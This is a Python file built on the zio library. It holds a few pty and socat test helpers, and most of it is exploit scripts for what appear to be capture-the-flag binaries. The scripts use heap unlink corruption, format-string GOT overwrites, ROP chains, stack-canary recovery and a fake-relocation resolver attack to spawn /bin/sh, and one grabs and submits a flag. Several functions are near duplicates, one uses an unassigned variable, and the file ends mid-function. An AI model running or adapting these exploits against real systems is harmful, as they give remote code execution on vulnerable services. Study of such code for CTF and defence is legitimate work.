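def test_tty_raw_out(self):
    """Check that stdout=TTY_RAW passes CR/LF and non-printable bytes through untouched.

    Part one runs a printf with a random mix of '\\r\\n' / '\\n' line endings
    and expects the bytes back verbatim (no CRLF translation by the pty
    layer). Part two has myprintf.py echo every non-printable byte in a
    shuffled order and expects exactly those bytes framed by "\\r\\n" / "\\n".
    """
    s = []
    ans = []
    for i in range(10):
        r = random.randint(0, 1)
        # s holds the backslash-escaped form printf parses; ans the raw bytes
        # we expect to read back.
        s.append('%d%s' % (i, r and '\\r\\n' or '\\n'))
        ans.append('%d%s' % (i, r and '\r\n' or '\n'))
    ans = ''.join(ans)
    cmd = "printf '" + ''.join(s) + "'"
    io = zio(cmd, stdout=TTY_RAW)
    try:
        rd = io.read()
    finally:
        io.close()
    self.assertEqual(rd, ans)

    unprintable = [chr(c) for c in range(256) if chr(c) not in string.printable]
    from zio import which
    py = which('python2') or which('python')
    self.assertNotEqual(py, None)
    # NOTE(review): locating myprintf.py through sys.argv[0] only works when
    # this file is executed directly; under a test runner argv[0] is the
    # runner. os.path.dirname(__file__) would be the robust choice.
    helper = os.path.join(os.path.dirname(sys.argv[0]), 'myprintf.py')
    for i in range(10):
        random.shuffle(unprintable)
        # repr() yields the escaped form; [1:-1] drops the surrounding quotes so
        # the whole thing can be wrapped in a single-quoted shell argument.
        arg = "'\\r\\n" + repr(''.join(unprintable))[1:-1] + "\\n'"
        io = zio(' '.join([py, '-u', helper, arg]),
                 stdout=TTY_RAW, print_read=COLORED(REPR))
        try:
            rd = io.read()
        finally:
            # the original never closed these ten children; close each one so
            # ptys/processes do not accumulate across iterations.
            io.close()
        self.assertEqual(rd, "\r\n" + ''.join(unprintable) + "\n")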
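def cmdline(self, cmd, **kwargs):
    """Yield a zio for `cmd` twice: spawned directly, then through a socat TCP listener.

    kwargs are forwarded to zio(). The optional 'socat_exec' entry replaces
    the socat exec-address suffix (default ',pty,stderr,ctty') and is
    consumed here. The socat stage retries up to 16 random ports in
    31337..65530 and stops after the first successful session.
    `cmd` is spliced into a socat address string, so it must be trusted.
    """
    print('')
    socat_exec = kwargs.pop('socat_exec', ',pty,stderr,ctty')
    io = zio(cmd, **kwargs)
    try:
        yield io
    finally:
        io.close()
    print('"%s" exited: %s' % (cmd, io.exit_code))
    for _ in range(16):
        port = random.randint(31337, 65530)
        p = subprocess.Popen([
            'socat', 'TCP-LISTEN:%d' % port,
            'exec:"' + cmd + '"' + socat_exec
        ])
        time.sleep(0.2)
        # Popen.returncode is only set by poll()/wait(); the original tested
        # it unpolled, so a socat that died (e.g. port in use) went unnoticed.
        if p.poll() is not None:
            continue
        try:
            io = zio(('127.0.0.1', port), **kwargs)
        except socket.error:
            # connection refused: do not leave the listener running.
            p.terminate()
            p.wait()
            continue
        try:
            yield io
        finally:
            io.close()
            p.terminate()
            p.wait()
        break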
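def cmdline(self, cmd, **kwargs):
    """Generator: first a directly spawned zio for `cmd`, then one reached via socat.

    'socat_exec' in kwargs overrides the exec-address suffix (default
    ',pty,stderr,ctty'); all other kwargs go to zio(). Up to 16 random
    ports are tried for the socat stage. `cmd` ends up inside a socat
    address string and must come from a trusted source.
    """
    print('')
    socat_exec = kwargs.pop('socat_exec', ',pty,stderr,ctty')
    io = zio(cmd, **kwargs)
    try:
        yield io
    finally:
        io.close()
    print('"%s" exited: %s' % (cmd, io.exit_code))
    for _ in range(16):
        port = random.randint(31337, 65530)
        listener = subprocess.Popen(['socat', 'TCP-LISTEN:%d' % port,
                                     'exec:"' + cmd + '"' + socat_exec])
        time.sleep(0.2)
        # poll() is required to populate returncode; without it the liveness
        # check of the original never fired.
        if listener.poll() is not None:
            continue
        try:
            io = zio(('127.0.0.1', port), **kwargs)
        except socket.error:
            listener.terminate()
            listener.wait()
            continue
        try:
            yield io
        finally:
            io.close()
            listener.terminate()
            listener.wait()
        break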
def mk(target, debug=True):
    """Open a zio session on `target` with a 10000s timeout.

    With debug=True reads are echoed in red and writes in yellow (REPR form);
    with debug=False all echoing is disabled.
    """
    read_echo = COLORED(REPR, 'red') if debug else False
    write_echo = COLORED(REPR, 'yellow') if debug else False
    return zio(target, print_read=read_echo, print_write=write_echo, timeout=10000)
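def test_tty(self):
    """Without stdin=TTY the child sees no terminal; with it, `tty` prints a /dev/ path."""
    print('')
    io = zio('tty')
    try:
        out = io.read()
    finally:
        io.close()  # the original never closed either child
    self.assertEqual(out.strip(), 'not a tty', repr(out))
    io = zio('tty', stdin=TTY)
    try:
        out = io.read()
    finally:
        io.close()
    self.assertTrue(out.strip().startswith('/dev/'), repr(out))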
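def test_tty(self):
    """`tty` must report 'not a tty' on a pipe and a /dev/ device when stdin=TTY is used."""
    print('')
    for kwargs, check in (
        ({}, lambda out: self.assertEqual(out.strip(), 'not a tty', repr(out))),
        ({'stdin': TTY}, lambda out: self.assertTrue(out.strip().startswith('/dev/'), repr(out))),
    ):
        io = zio('tty', **kwargs)
        try:
            out = io.read()
        finally:
            # close each child; the original leaked both.
            io.close()
        check(out)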
def exp(target):
    """Heap exploit driven through new_sc/edit_sc/delete_sc/list_sc.

    Three chunks are allocated (the author's address notes are kept in the
    trailing comments); chunk 0 is overwritten with what looks like a fake
    chunk whose fd/bk point at ptr_addr-0x18 / ptr_addr-0x10 (the classic
    unlink shape — the comment confirms *0x6016d0 becomes 0x6016b8 when
    chunk 1 is freed). The corrupted pointer table is then used to point
    entry 0 at free@GOT, leak free's address with list_sc, compute system
    from a hard-coded libc offset pair, overwrite free@GOT, and free the
    '/bin/sh;' chunk to pop a shell. Ends in interact().
    """
    #io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    new_sc(io, 'a' * 0x80) #0x603010
    new_sc(io, 'b' * 0x80) #0x6030c0
    new_sc(io, '/bin/sh;' + 'c' * 0x78) #0x603170
    ptr_addr = 0x00000000006016d0 # rax rdx
    # fake chunk: prev_size 0, size 0x81, fd/bk around ptr_addr, filler, then
    # the next chunk's prev_size/size fields (0x80 / 0x90).
    payload = l64(0) + l64(0x81) + l64(ptr_addr - 0x18) + l64(
        ptr_addr - 0x10) + 'a' * 0x60 + l64(0x80) + l64(0x90)
    edit_sc(io, 0, payload) # change *0x6016d0 = 0x6016b8
    delete_sc(io, 1)
    free_got = 0x0000000000601600
    # rewrite the (now self-pointing) table so that slot 0 references free@GOT
    payload2 = l64(0) + l64(1) + l64(0x80) + l64(free_got)
    edit_sc(io, 0, payload2)
    free_addr = list_sc(io)
    print hex(free_addr)
    #local system_addr = 0x00007FFFF7A5B640
    # system = free - offset(free) + offset(system) for the target's libc
    system_addr = 0x0000000000044C40 + free_addr - 0x0000000000082DA0
    '''
    libc_base = free_addr - 0x0000000000082DF0
    system_addr = libc_base + 0x0000000000046640
    '''
    edit_sc(io, 0, l64(system_addr))
    delete_sc(io, 2)
    io.interact()
def exp(target):
    """Heap corruption through the add_function/enter_edit/edit_comments/add_read_write helpers.

    Two functions are created, then the comment buffers of entries 2 and 1
    are filled with fake chunk headers (sizes 0x51/0x31/0x21 and fd/bk set
    to heap_ptr-0x18 / heap_ptr-0x10, i.e. an unlink-style layout). The
    edit_comments(io, -1, payload) call presumably performs the out-of-bounds
    write and add_read_write(io, '', 'b' * 99) the allocation that triggers
    it; what the helpers do internally is not visible here. The trailing
    comments are the author's address notes for one build.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    add_function(io, 'fun1', 'para1', 'data1')
    add_function(io, 'fun2', 'para2', 'data2')
    enter_edit(io, 2)
    edit_comments(io, 100, 'comment')
    add_read_write(io, 'a' * 80, 'b' * 80)
    heap_ptr = 0x6036f0
    # fake chunk of size 0x51 whose fd/bk bracket heap_ptr, followed by the
    # next chunk's prev_size/size (0x50 / 0xa0).
    payload = 'a' * 0x60 + l64(0) + l64(0) + l64(0) + l64(0x51) + l64(
        heap_ptr - 0x18) + l64(heap_ptr - 0x10)
    payload += 'a' * 0x30 + l64(0x50) + l64(0xa0)
    enter_edit(io, 1)
    edit_comments(
        io, 200, 'a' * 0x30 + l64(0) + l64(0x31) + 'a' * 0x20 + l64(0) + l64(0x21))
    enter_edit(io, 2)
    edit_comments(io, -1, payload)
    add_read_write(io, '', 'b' * 99)
    #g_readall :0x0000000000604460
    #g_writeall: 0x0000000000604400
    #g_ptr: 0x0000000000604050
    #comment: 0x0000000000604390
    #0x00000000006044c0
    interact(io)
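def exp(target):
    """Attack ./fsb through its format-string bug.

    `target` is accepted for interface parity but ignored: the binary is
    always spawned locally as ./fsb. Step 1 leaks the stack slot at
    %2217$x and only continues when it equals the expected key address
    0x804a060; step 2 writes to that slot with %2217$lln, the remaining
    prompts are answered with '0', and the shell is handed to the user.
    """
    io = zio('./fsb', print_read=False, print_write=False)
    io.read_until('(1)')
    io.writeline('%2217$x')
    leak = 0
    try:
        io.read_line()
        leak = int(io.read_until('\n')[0:-1], 16)
    except Exception:
        # The original used a bare except. Keep the "treat as no leak"
        # semantics, but stop swallowing KeyboardInterrupt/SystemExit.
        pass
    print(hex(leak))
    if leak != 0x804a060:
        io.close()
        return
    print('\n[+] find address of key')
    io.read_until('(2)')
    io.writeline('%2217$lln')
    for prompt in ('(3)', '(4)', 'key :'):
        io.read_until(prompt)
        io.writeline('0')
    print('[+] your shell !')
    io.interact()
    io.close()
    exit()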
def get_io(target):
    """Return a zio session on `target` (timeout 9999, RAW echo: reads green, writes blue).

    ELF(target) is called first and its result discarded — presumably for a
    side effect; nothing here uses the return value.
    """
    ELF(target)
    read_echo = COLORED(RAW, "green")
    write_echo = COLORED(RAW, "blue")
    return zio(target, timeout=9999, print_read=read_echo, print_write=write_echo)
def exp(target):
    """Build a 16000-byte input with a fixed per-byte histogram and a ROP chain spliced in.

    Every byte value 0..0xd0 is emitted round-robin so the counts are as even
    as possible (16000 / 0xd1 each, +1 for the first remainder values); the
    bytes used by `payload` are subtracted from those counts first, so the
    overall histogram is unchanged after the payload is inserted at offset
    0x18. Presumably the target validates that histogram — not visible here.
    The ROP chain is pop rdi; ret -> "sh" string -> system@plt.
    Python 2 integer division is relied on in `16000 / 0xd1`.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    io.gdb_hint()
    io.read_until('Bucko')
    count_dict = {}
    for i in range(0xd1):
        count = 16000 / 0xd1
        if i < 16000 % 0xd1:
            count += 1
        count_dict[i] = count
    system_plt = 0x0000000000400FD0
    pop_rdi_ret = 0x0000000000402703
    sh = 0x4008ca
    # two 32-bit fields and 8 bytes of padding before the return address
    payload = l32(8001) + l32(0x20) + 'a' * 8
    payload += l64(pop_rdi_ret) + l64(sh) + l64(system_plt)
    # every payload byte must be < 0xd1 or this raises KeyError
    for c in payload:
        count_dict[ord(c)] -= 1
    d = ''
    for i in range(0xd1):
        d += chr(i) * count_dict[i]
    d = d[0:0x18] + payload + d[0x18:]
    io.gdb_hint()
    io.writeline(d)
    interact(io)
def exp(target):
    """Plant shellcode in a low note, grow the stack, then overwrite a high note with its address.

    Nesting below was reconstructed from a collapsed listing. Flow: allocate
    notes until one lands below 0xf0000000, fill it with NOP-padded
    `shellcode`; then repeatedly push the stack down with 0x400-byte secret()
    calls while allocating notes until one maps at or above 0xffd60000; the
    loop stops when such a note is not just "\\n". Finally that note is
    filled with the low note's address and exit_ret() triggers the jump.

    NOTE(review): the inner while tests `mem[1] > 0xffffd000` (the shellcode
    note, already < 0xf0000000), not `mem1[1]`, so that half is always false;
    and after the while, `mem1[1] < 0xffd60000` in the break test can never
    hold, so the for loop runs all 0x1000 iterations. Likely a mem/mem1
    mix-up — confirm against the original intent before relying on it.
    """
    io = zio(target, timeout=10000, print_read=False, print_write=False)
    mem = create_note(io)
    while mem[1] > 0xf0000000:
        delete_note(io, mem[0])
        mem = create_note(io)
    print hex(mem[1])
    write_note(io, mem[0], shellcode.rjust(0x100, '\x90'))
    # stack grow
    for i in range(0, 0x1000):
        secret(io, 'A' * 0x400)
        print i
        mem1 = create_note(io)
        while (mem1[1] < 0xffd60000) or (mem[1] > 0xffffd000):
            delete_note(io, mem1[0])
            mem1 = create_note(io)
        note = read_note(io, mem1[0])
        print "[-] memory address: " + hex(mem1[1])
        print "[-] note: " + note.encode('hex') + '\n'
        if (mem1[1] >= 0xf7ffc000) and (mem1[1] < 0xffd60000):
            if note != '\x0a':
                break
    # one page (Python 2 integer division) minus one slot of the shellcode address
    payload = l32(mem[1]) * (0x1000 / 4 - 1)
    print '\n-------------find it-------------------'
    print '[+] write to : ' + hex(mem1[1])
    print '[+] with payload : ' + payload.encode('hex')
    write_note(io, mem1[0], payload)
    exit_ret(io)
    io.interact()
    io.close()
def exp(target):
    """Leak atoi via a planted GOT pointer, then overwrite atoi@GOT with system.

    After two functions exist, entry 2's comment is edited so that the
    pointer at offset 0x18 becomes atoi@GOT; deleting entry 2 and creating
    three more makes show_function(3) print through that pointer, which
    yields atoi's address after the '#' marker. system is computed from
    hard-coded libc offsets (the commented pair is an alternative build).
    Editing entry 3's comment then writes 7 bytes of system's address over
    atoi@GOT, and sending 'sh' at the menu makes the menu's atoi() call
    system("sh"). Ends in interact().
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    add_function(io, 'fun1', 'para1', 'data1')
    add_function(io, 'fun2', 'para2', 'data2')
    enter_edit(io, 2)
    atoi_got = 0x603230
    edit_comments(io, 666, 'a' * 0x18 + l64(atoi_got))
    #fun1 0x604070
    #fun2 0x604200 comment:0x604390
    delete_function(io, 2)
    add_function(io, 'fun3', 'para3', 'data3')
    add_function(io, 'fun4', 'para4', 'data4')
    add_function(io, 'fun5', 'para5', 'data5')
    show_function(io, 3)
    io.read_until('#')
    # the leaked bytes are printed as a raw string; pad to 8 for unpacking
    atoi = l64(io.readline()[:-1].ljust(8, '\x00'))
    print hex(atoi)
    base = atoi - 0x0000000000036E80
    system = base + 0x0000000000045390
    #base = atoi - 0x0000000000033C10
    #system = base + 0x000000000003E8B0
    enter_edit(io, 3)
    # 7 bytes: the top byte of a user-space address is 0 already
    edit_comments(io, 8, l64(system)[:-1])
    io.read_until('Option')
    io.writeline('sh')
    interact(io)
def exp(target):
    """Format-string write through the service's RSA decrypt path.

    A tiny RSA key (p=7, q=37, e=7, d=egcd(e, phi) — egcd is presumably the
    modular inverse helper; not visible here) is installed with set_key so
    get_cypher() can encrypt the attacker-chosen plaintext. The plaintext is
    a positional format string: %n/%hn writes via arguments 77..83 whose
    pointers are the GOT slots of printf and putchar appended after the
    format (2-byte granularity, padded with %0NNNlx). The ';/bin/sh' tail is
    the command for the redirected call. decrypt() then feeds it to the
    vulnerable printf and interact() takes over.
    """
    p = 7
    q = 37
    e = 7
    d = egcd(e, (p - 1) * (q - 1))
    # print 'p=%d\nq=%d\ne=%d\nd=%d\n' % (p, q, e, d)
    # io = zio(target, timeout = 100000, print_read = COLORED(RAW, 'red'), print_write = COLORED(RAW, 'yellow'))
    io = zio(target, timeout=100000, print_read=False, print_write=False)
    set_key(io, p, q, e, d)
    plt_system = 0x004007c0
    got_printf = 0x00602028
    got_putchar = 0x00602000
    adr_ret = 0x0040122b
    payload = get_cypher(
        io, '%83$n%79$n%064lx%78$hn%82$hn%01920lx%77$hn%02667lx%81$hn;/bin/sh\x00')
    # targets for the positional writes: printf@GOT and putchar@GOT in 2-byte steps
    payload += l64(got_printf)
    payload += l64(got_printf + 2)
    payload += l64(got_printf + 4)
    payload += l64(got_printf + 6)
    payload += l64(got_putchar)
    payload += l64(got_putchar + 2)
    payload += l64(got_putchar + 4)
    payload += l64(got_putchar + 6)
    decrypt(io, payload)
    io.interact()
def exp(target):
    """32-bit heap exploit via add_domain/remove_domain/lookup_domain/list_domain/edit_domain_name.

    Eleven domains are laid out so that, after freeing 1 and 2 (with a
    lookup in between), a new 0x90 allocation and a 272-byte + free@GOT
    payload land such that list_domain() prints free's address. system is
    then derived from a libc offset pair, written over free@GOT through
    edit_domain_name(1, ...), and freeing domain 10 ('/bin/sh;...') calls
    system. The inline address comments are the author's notes for the
    local build.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    io.gdb_hint()
    add_domain(io, '0' * (0x800 - 16 - 8 - 1 - 4 - 3)+'12') #0 0x804c008 0x804c7f0
    add_domain(io, '0'*0x770) #1 0x804c878 0x804cff0 top=0x804d070
    add_domain(io, '0'*0x1a0) #2
    add_domain(io, '/bin/sh'+'0'*0x88) #3 0x0804d340 0x0804d2a8
    add_domain(io, '0'*0x10) #4 0x0804d3e0
    add_domain(io, '0'*0x5b0) #5
    add_domain(io, '0'*0x770) #6
    add_domain(io, '0'*0x770) #7
    add_domain(io, '0'*0x770) #8
    add_domain(io, '0'*0x770) #9
    add_domain(io, '/bin/sh;'+'0'*(0x770-8)) #10
    remove_domain(io, 1)
    lookup_domain(io, 0)
    remove_domain(io, 2)
    # top = 0x804d070 unsort=0x804d218
    ptr_addr = 0x0804b0a4
    add_domain(io, '0'*0x90) #1 0x0804d220
    free_got = 0x0804b004
    payload2 = 272*'1' + l32(free_got)
    add_domain(io, payload2)
    free = list_domain(io)
    #local system = 0xb7e55060
    #remote
    # system = free - offset(free) + offset(system)
    system = free - 0x781b0 + 0x3d170
    edit_domain_name(io, 1, l32(system))
    remove_domain(io, 10)
    io.interact()
def exp(target):
    """Unlink-style heap exploit over new_sc/edit_sc/delete_sc/list_sc (same flow as the sibling exp).

    Chunk 0 receives a fake chunk whose fd/bk are ptr_addr-0x18/-0x10 so that
    freeing chunk 1 rewrites the pointer table (per the comment,
    *0x6016d0 -> 0x6016b8); slot 0 is then pointed at free@GOT, free is
    leaked with list_sc, system computed from fixed libc offsets, free@GOT
    overwritten, and freeing the '/bin/sh;' chunk runs it.
    """
    #io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    new_sc(io, 'a'*0x80) #0x603010
    new_sc(io, 'b'*0x80) #0x6030c0
    new_sc(io, '/bin/sh;'+'c'*0x78) #0x603170
    ptr_addr = 0x00000000006016d0 # rax rdx
    # prev_size, size 0x81, fd, bk, filler, next chunk's prev_size/size
    payload = l64(0) + l64(0x81) + l64(ptr_addr-0x18) + l64(ptr_addr-0x10) + 'a'*0x60 + l64(0x80) + l64(0x90)
    edit_sc(io, 0, payload) # change *0x6016d0 = 0x6016b8
    delete_sc(io, 1)
    free_got = 0x0000000000601600
    payload2 = l64(0) + l64(1) +l64(0x80) + l64(free_got)
    edit_sc(io, 0, payload2)
    free_addr = list_sc(io)
    print hex(free_addr)
    #local system_addr = 0x00007FFFF7A5B640
    system_addr = 0x0000000000044C40 + free_addr - 0x0000000000082DA0
    '''
    libc_base = free_addr - 0x0000000000082DF0
    system_addr = libc_base + 0x0000000000046640
    '''
    edit_sc(io, 0, l64(system_addr))
    delete_sc(io, 2)
    io.interact()
def exp(target):
    """Recover the stack canary from the captcha, then overflow into a system() call.

    ./leak is run with the current time (+/-10s jitter) as argument and
    prints '*'-separated integers; the captcha the service shows is a linear
    combination of those values plus the canary, so the canary is solved for
    here (the exact formula mirrors the service; it is not visible in this
    file). The overflow payload (0x200 bytes, canary, 0xc bytes, system@plt,
    fake return, pointer into the global buffer where the 'A/bin/sh' tail of
    the base64 line lands) is sent base64-encoded as the service requests.
    """
    # leak info
    leak = os.popen('./leak ' + str(int(time.time()) + random.randint(-10, 10))).read().split('*')[0:-1]
    leak = [int(l) for l in leak]
    io = zio(target, print_read=False, print_write=False)
    # calc canary
    io.read_until('input captcha : ')
    captcha = int(io.read_line()[0:-1])
    canary = captcha - leak[1] - leak[2] + leak[3] - leak[4] - leak[5] + leak[
        6] - leak[7]
    print '[+] leak canary : ' + hex(ctypes.c_uint32(canary).value)
    io.writeline(str(captcha))
    io.read_until('Encode your data with BASE64 then paste me!')
    plt_system = 0x8048880
    adr_gbuf = 0x804b0e0
    payload = 'A' * 0x200
    payload += l32(canary)
    payload += 'A' * 0xc
    payload += l32(plt_system)
    payload += l32(0xdeadbeef)
    # argument for system(): the '/bin/sh' appended after the base64 text
    payload += l32(adr_gbuf + 0x2d1)
    io.writeline(base64.b64encode(payload) + 'A/bin/sh')
    io.interact()
def get_io(target):
    """Spawn `target` with a 9999s timeout; RAW echo with reads in green and writes in blue.

    ELF("./main") is evaluated first and its result dropped — presumably for a
    side effect; nothing in this function uses it.
    """
    ELF("./main")
    return zio(target, timeout=9999,
               print_read=COLORED(RAW, 'green'),
               print_write=COLORED(RAW, 'blue'))
def exp(target):
    """Variant of the add_domain heap exploit with the remote system offset commented out.

    Same layout as the sibling exp: free@GOT is leaked through list_domain
    after the heap grooming, system would be written over free@GOT via
    edit_domain_name(1, ...) and freeing domain 10 ('/bin/sh;...') runs it.

    NOTE(review): the only assignment to `system` in this function is
    commented out, so `l32(system)` raises NameError unless a module-level
    `system` exists — presumably it was meant to be filled in per target.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    io.gdb_hint()
    add_domain(io, '0' * (0x800 - 16 - 8 - 1 - 4 - 3)+'12') #0 0x804c008 0x804c7f0
    add_domain(io, '0'*0x770) #1 0x804c878 0x804cff0 top=0x804d070
    add_domain(io, '0'*0x1a0) #2
    add_domain(io, '/bin/sh'+'0'*0x88) #3 0x0804d340 0x0804d2a8
    add_domain(io, '0'*0x10) #4 0x0804d3e0
    add_domain(io, '0'*0x5b0) #5
    add_domain(io, '0'*0x770) #6
    add_domain(io, '0'*0x770) #7
    add_domain(io, '0'*0x770) #8
    add_domain(io, '0'*0x770) #9
    add_domain(io, '/bin/sh;'+'0'*(0x770-8)) #10
    remove_domain(io, 1)
    lookup_domain(io, 0)
    remove_domain(io, 2)
    # top = 0x804d070 unsort=0x804d218
    ptr_addr = 0x0804b0a4
    add_domain(io, '0'*0x90) #1 0x0804d220
    free_got = 0x0804b004
    payload2 = 272*'1' + l32(free_got)
    add_domain(io, payload2)
    free = list_domain(io)
    #local system = 0xb7e55060
    #remote
    #system = free - 0x781b0 + 0x3d170
    edit_domain_name(io, 1, l32(system))
    remove_domain(io, 10)
    io.interact()
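def get_io(target):
    """Return a zio session on `target` with a 9999s timeout and zio's default echoing.

    The original built COLORED(RAW, ...) read/write modes but never passed
    them (the keyword arguments were commented out); those dead locals are
    dropped so the code says what actually happens.
    """
    return zio(target, timeout=9999)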
def exp(target):
    """Format-string exploit: leak libc and a stack address, rewrite free@GOT to system, grab the flag.

    send_message(io, '%63$p') leaks a libc pointer (libc_base derived with a
    fixed offset), '%46$p' a stack pointer (printed but unused afterwards).
    The write payload starts with 'aaa;sh;' so that system() on the buffer
    runs sh; three %hn writes via positional args 14..16 (whose pointers are
    appended at byte 48) patch free@GOT two bytes at a time, ordered by value
    so each pad length is non-negative (a pad < 8 uses literal 'A's instead
    of a %Nx field). do_fmt2 sends it; a short length-prefixed message
    ('\\x03sh;', framing per the service protocol) then triggers the freed
    buffer, after which the flag is read and submitted.
    """
    io = zio(target, timeout=30, print_read=COLORED(NONE, 'red'), \
             print_write=COLORED(NONE, 'green'))
    #io.read_until('Token')
    #io.writeline('NxArhGPKLMmen9Y9QPePHSBbFqQPiqnU')
    io.read_until('?')
    io.writeline('S')
    d = int(send_message(io, '%63$p'), 16)
    libc_base = d - 0x0000000000020830
    print 'libc_base', hex(libc_base)
    system = libc_base + 0x0000000000045390
    binsh = libc_base + 0x000000000018CD17
    pop_rdi_ret = 0x0000000000402723
    stack = int(send_message(io, '%46$p'), 16)
    print 'stack', hex(stack)
    free_got = 0x00000000006040A8
    addr = l64(free_got)+l64(free_got+2)+l64(free_got+4)
    # 16-bit slices of system, keyed by which GOT half-word they go to
    writes = {}
    writes[0] = system & 0xffff
    writes[1] = (system>> 16) & 0xffff
    writes[2] = (system>> 32) & 0xffff
    payload = 'aaa;sh;'
    printed = len(payload)
    for where, what in sorted(writes.items(), key=operator.itemgetter(1)):
        delta = (what - printed) & 0xffff
        if delta > 0:
            if delta < 8:
                payload += 'A' * delta
            else:
                payload += '%' + str(delta) + 'x'
        payload += '%' + str(14 + where) + '$hn'
        printed += delta
    payload = payload.ljust(48, 'a')
    payload += addr
    print len(payload)
    do_fmt2(io, payload)
    payload = '\x03sh;'
    io.write(l16(1)+l16(0)+l32(len(payload)+8))
    io.write(payload)
    io.writeline('echo 123')
    io.read_until('123\n')
    io.writeline('./bin/cat flag/flag')
    flag = io.readline()[:-1].strip()
    print target
    print 'flag', flag
    submit_flag(flag)
    io.close()
def exp(target):
    """Two-stage ROP through a mangled saved-pointer pair: leak puts, then call system("/bin/sh").

    show(io, 1) returns the binary base, a stack address and a cookie. The
    edit() payload stores rol(value ^ cookie) pairs — the same XOR-then-rotate
    shape as glibc's pointer mangling, so presumably the target demangles
    them before use — to redirect rsp to a controlled frame and land on a
    pop rdi; ret gadget. Stage 1 (entered via the oversized menu number)
    puts(puts@GOT) and returns to main; stage 2 repeats with system/binsh.
    The commented offsets are for an alternative libc build.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    io.read_until(':')
    io.writeline(str(92233720368547759))
    base, rsp, cookie = show(io, 1)
    print 'base', hex(base)
    fake_rsp = rsp - 0x48
    pop_rdi_ret = base + 0x000000000001523
    addr = l64(rol(fake_rsp ^ cookie)) + l64(rol(pop_rdi_ret ^ cookie))
    print HEX(addr)
    edit(io, 1, 0, "", addr, "")
    io.read_until('>>')
    payload = '5;' + 'a' * 6
    puts_got = 0x0000000000202018 + base
    puts_plt = 0x9a0 + base
    main = base + 0x00000000000013ff
    payload += l64(puts_got) + l64(puts_plt) + l64(main)
    io.writeline(payload)
    # puts() prints the raw GOT bytes; strip the newline and zero-extend to 8
    puts_addr = l64(io.readline()[:-1].ljust(8, '\x00'))
    '''
    base = puts_addr - 0x000000000006F5D0
    system = base + 0x0000000000045380
    print 'system', hex(system)
    binsh = base + 0x000000000018C58B
    '''
    base = puts_addr - 0x000000000006FD60
    print 'base', hex(base)
    system = base + 0x0000000000046590
    binsh = base + 0x000000000017C8C3
    #io.gdb_hint()
    io.read_until(':')
    io.writeline(str(92233720368547759))
    fake_rsp = rsp - 0x80
    addr = l64(rol(fake_rsp ^ cookie)) + l64(rol(pop_rdi_ret ^ cookie))
    print HEX(addr)
    io.gdb_hint()
    edit(io, 1, 0, "", addr, "")
    io.read_until('>>')
    payload = '5;' + 'a' * 6
    payload += l64(binsh) + l64(system) + l64(main)
    io.writeline(payload)
    #io.gdb_hint()
    interact(io)
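def get_io(target):
    """Spawn `target` under the libc at the module-level `libc_file_path` (LD_PRELOAD).

    Echoing is off and the timeout is 20s. Preloading a specific libc keeps
    the local run's offsets identical to the library the exploit was built
    against (presumably the remote one). The original computed COLORED(...)
    echo modes and immediately overwrote them with False; those dead locals
    and the commented-out 9999s variant are dropped here.
    """
    return zio(target, timeout=20, print_read=False, print_write=False,
               env={"LD_PRELOAD": libc_file_path})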
def exp(target):
    """Open a RAW-echoing session on `target`, run write_any() against it, then drop to interact()."""
    session = zio(target, timeout=10000,
                  print_read=COLORED(RAW, 'red'),
                  print_write=COLORED(RAW, 'green'))
    write_any(session)
    session.interact()
def get_io(target):
    """Connect to `target`, echo its captcha back, and return (io, captcha).

    The captcha is whatever follows 'input captcha : ' up to the newline
    (evidently read_until includes the delimiter, since it is written back
    without adding one). The session is left just after 'then paste me!\\n'.
    """
    session = zio(target, timeout=9999)
    session.read_until("input captcha : ")
    captcha = session.read_until("\n")
    session.write(captcha)
    session.read_until("then paste me!\n")
    return session, captcha
def exp(target):
    """Stack pivot + ret2dl-resolve style chain using write_16byte() as an arbitrary write.

    Stage 1: write a ROP chain at 0x601b00 that calls write(1, leak_addr, ...)
    and re-enters at 0x400582, then pivot into it with a leave; ret. The 8
    bytes read back after ':' give link_map (+0x28 adjustment). Stage 2:
    zero 16 bytes at link_map+0x1c8 (presumably to disable version checks —
    not verifiable here), write a fake relocation entry and a fake symbol
    whose name points at the string "system", put '/bin/sh' in memory, and
    build a chain that pops rdi and jumps to PLT0 with the fake relocation
    index, so the resolver binds and calls system('/bin/sh'). Pivot again
    and hand over to interact().
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    pop_rdi_ret = 0x0000000000400603
    pop_rsi_r15_ret = 0x0000000000400601
    leak_addr = 0x600ef0
    write_plt = 0x0000000000400430
    pop_rbp_ret = 0x4004d0
    leak_rop = l64(pop_rsi_r15_ret) + l64(leak_addr) + l64(0) + l64(
        pop_rdi_ret) + l64(1) + l64(write_plt)
    leak_rop += l64(pop_rbp_ret) + l64(0x601f00) + l64(0x400582)
    # write_16byte stores 16 bytes; pad each 8-byte word with zeros
    for i in range(0, len(leak_rop), 8):
        write_16byte(io, 0x601b00 + i, leak_rop[i:i + 8] + '\x00' * 8)
    leave_ret = 0x40059d
    leak_stack_povit = 'a' * 0x10 + l64(0x601b00 - 0x8) + l64(leave_ret)
    io.write(leak_stack_povit)
    io.read_until(':')
    link_map_addr = l64(io.read(8)) + 0x28
    print hex(link_map_addr)
    r_offset = 0x601970 # a writable addr
    r_sym = 0x155e8
    fake_relro = generate_fake_relro(r_offset, r_sym).ljust(0x20, '\x00')
    st_name = 0x200d68
    fake_sym = generate_fake_sym(st_name).ljust(0x20, '\x00')
    write_16byte(io, link_map_addr + 0x1c8, '\x00' * 0x10)
